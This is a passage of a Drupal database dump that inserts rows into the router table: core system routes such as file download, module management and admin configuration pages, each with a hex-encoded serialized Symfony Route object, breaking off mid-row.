('system.files', '/system/files/{scheme}', '/system/files', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f73797374656d2f66696c65732f7b736368656d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a225c44727570616c5c73797374656d5c46696c65446f776e6c6f6164436f6e74726f6c6c65723a3a646f776e6c6f6164223b733a363a22736368656d65223b733a373a2270726976617465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a373a225f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a363a22736368656d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34343a227b5e2f73797374656d2f66696c6573283f3a2f283f503c736368656d653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22736368656d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f73797374656d2f66696c6573223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a363a22736368656d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31333a222f73797374656d2f66696c6573223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.file_system_settings', '/admin/config/media/file-system', '/admin/config/media/file-system', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33313a222f61646d696e2f636f6e6669672f6d656469612f66696c652d73797374656d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33343a225c44727570616c5c73797374656d5c466f726d5c46696c6553797374656d466f726d223b733a363a225f7469746c65223b733a31313a2246696c652073797374656d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33393a227b5e2f61646d696e2f636f6e6669672f6d656469612f66696c655c2d73797374656d247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f636f6e6669672f6d656469612f66696c652d73797374656d223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33313a222f61646d696e2f636f6e6669672f6d656469612f66696c652d73797374656d223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.image_toolkit_settings', '/admin/config/media/image-toolkit', '/admin/config/media/image-toolkit', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33333a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d746f6f6c6b6974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33363a225c44727570616c5c73797374656d5c466f726d5c496d616765546f6f6c6b6974466f726d223b733a363a225f7469746c65223b733a31333a22496d61676520746f6f6c6b6974223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34313a227b5e2f61646d696e2f636f6e6669672f6d656469612f696d6167655c2d746f6f6c6b6974247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d746f6f6c6b6974223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33333a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d746f6f6c6b6974223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.js_asset', '/sites/default/files/js/{file_name}', '/sites/default/files/js/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33353a222f73697465732f64656661756c742f66696c65732f6a732f7b66696c655f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35313a2244727570616c5c73797374656d5c436f6e74726f6c6c65725c4a734173736574436f6e74726f6c6c65723a3a64656c69766572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a373a225f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a2266696c655f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35323a227b5e2f73697465732f64656661756c742f66696c65732f6a732f283f503c66696c655f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a2266696c655f6e616d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32333a222f73697465732f64656661756c742f66696c65732f6a73223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a2266696c655f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a32353a222f73697465732f64656661756c742f66696c65732f6a732f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('system.linkset_settings', '/admin/config/services/linkset', '/admin/config/services/linkset', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33303a222f61646d696e2f636f6e6669672f73657276696365732f6c696e6b736574223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a32313a224d656e75204c696e6b7365742053657474696e6773223b733a353a225f666f726d223b733a34323a2244727570616c5c73797374656d5c466f726d5c4d656e754c696e6b73657453657474696e6773466f726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33373a227b5e2f61646d696e2f636f6e6669672f73657276696365732f6c696e6b736574247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33303a222f61646d696e2f636f6e6669672f73657276696365732f6c696e6b736574223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33303a222f61646d696e2f636f6e6669672f73657276696365732f6c696e6b736574223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.logging_settings', '/admin/config/development/logging', '/admin/config/development/logging', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33333a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6c6f6767696e67223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33313a225c44727570616c5c73797374656d5c466f726d5c4c6f6767696e67466f726d223b733a363a225f7469746c65223b733a31383a224c6f6767696e6720616e64206572726f7273223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34303a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f6c6f6767696e67247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6c6f6767696e67223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33333a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6c6f6767696e67223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.machine_name_transliterate', '/machine_name/transliterate', '/machine_name/transliterate', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32373a222f6d616368696e655f6e616d652f7472616e736c69746572617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35313a225c44727570616c5c73797374656d5c4d616368696e654e616d65436f6e74726f6c6c65723a3a7472616e736c69746572617465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33343a227b5e2f6d616368696e655f6e616d652f7472616e736c69746572617465247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f6d616368696e655f6e616d652f7472616e736c69746572617465223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a32373a222f6d616368696e655f6e616d652f7472616e736c69746572617465223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('system.modules_list', '/admin/modules', '/admin/modules', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31343a222f61646d696e2f6d6f64756c6573223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a363a225f7469746c65223b733a363a22457874656e64223b733a31343a225f7469746c655f636f6e74657874223b733a31353a225769746820636f6d706f6e656e7473223b733a353a225f666f726d223b733a33353a225c44727570616c5c73797374656d5c466f726d5c4d6f64756c65734c697374466f726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31383a2261646d696e6973746572206d6f64756c6573223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f6e6f5f6269675f70697065223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32313a227b5e2f61646d696e2f6d6f64756c6573247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f61646d696e2f6d6f64756c6573223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31343a222f61646d696e2f6d6f64756c6573223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('system.modules_list_confirm', '/admin/modules/list/confirm', '/admin/modules/list/confirm', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32373a222f61646d696e2f6d6f64756c65732f6c6973742f636f6e6669726d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34323a225c44727570616c5c73797374656d5c466f726d5c4d6f64756c65734c697374436f6e6669726d466f726d223b733a363a225f7469746c65223b733a33393a22536f6d65207265717569726564206d6f64756c6573206d75737420626520696e7374616c6c6564223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31383a2261646d696e6973746572206d6f64756c6573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33343a227b5e2f61646d696e2f6d6f64756c65732f6c6973742f636f6e6669726d247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f6d6f64756c65732f6c6973742f636f6e6669726d223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32373a222f61646d696e2f6d6f64756c65732f6c6973742f636f6e6669726d223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.modules_list_non_stable_confirm', '/admin/modules/list/confirm-non-stable', '/admin/modules/list/confirm-non-stable', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33383a222f61646d696e2f6d6f64756c65732f6c6973742f636f6e6669726d2d6e6f6e2d737461626c65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35313a225c44727570616c5c73797374656d5c466f726d5c4d6f64756c65734c6973744e6f6e537461626c65436f6e6669726d466f726d223b733a363a225f7469746c65223b733a31383a224e6f6e2d737461626c65206d6f64756c6573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31383a2261646d696e6973746572206d6f64756c6573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34373a227b5e2f61646d696e2f6d6f64756c65732f6c6973742f636f6e6669726d5c2d6e6f6e5c2d737461626c65247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33383a222f61646d696e2f6d6f64756c65732f6c6973742f636f6e6669726d2d6e6f6e2d737461626c65223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33383a222f61646d696e2f6d6f64756c65732f6c6973742f636f6e6669726d2d6e6f6e2d737461626c65223b733a383a226e756d5061727473223b693a343b7d7d, 4);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('system.modules_uninstall', '/admin/modules/uninstall', '/admin/modules/uninstall', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32343a222f61646d696e2f6d6f64756c65732f756e696e7374616c6c223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34303a225c44727570616c5c73797374656d5c466f726d5c4d6f64756c6573556e696e7374616c6c466f726d223b733a363a225f7469746c65223b733a393a22556e696e7374616c6c223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31383a2261646d696e6973746572206d6f64756c6573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33313a227b5e2f61646d696e2f6d6f64756c65732f756e696e7374616c6c247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32343a222f61646d696e2f6d6f64756c65732f756e696e7374616c6c223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32343a222f61646d696e2f6d6f64756c65732f756e696e7374616c6c223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.modules_uninstall_confirm', '/admin/modules/uninstall/confirm', '/admin/modules/uninstall/confirm', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33323a222f61646d696e2f6d6f64756c65732f756e696e7374616c6c2f636f6e6669726d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34373a225c44727570616c5c73797374656d5c466f726d5c4d6f64756c6573556e696e7374616c6c436f6e6669726d466f726d223b733a363a225f7469746c65223b733a31373a22436f6e6669726d20756e696e7374616c6c223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31383a2261646d696e6973746572206d6f64756c6573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33393a227b5e2f61646d696e2f6d6f64756c65732f756e696e7374616c6c2f636f6e6669726d247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f6d6f64756c65732f756e696e7374616c6c2f636f6e6669726d223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33323a222f61646d696e2f6d6f64756c65732f756e696e7374616c6c2f636f6e6669726d223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.performance_settings', '/admin/config/development/performance', '/admin/config/development/performance', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33373a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f706572666f726d616e6365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35343a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c506572666f726d616e6365436f6e74726f6c6c65723a3a6275696c64223b733a363a225f7469746c65223b733a31313a22506572666f726d616e6365223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34343a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f706572666f726d616e6365247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f706572666f726d616e6365223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33373a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f706572666f726d616e6365223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.php', '/admin/reports/status/php', '/admin/reports/status/php', 15, 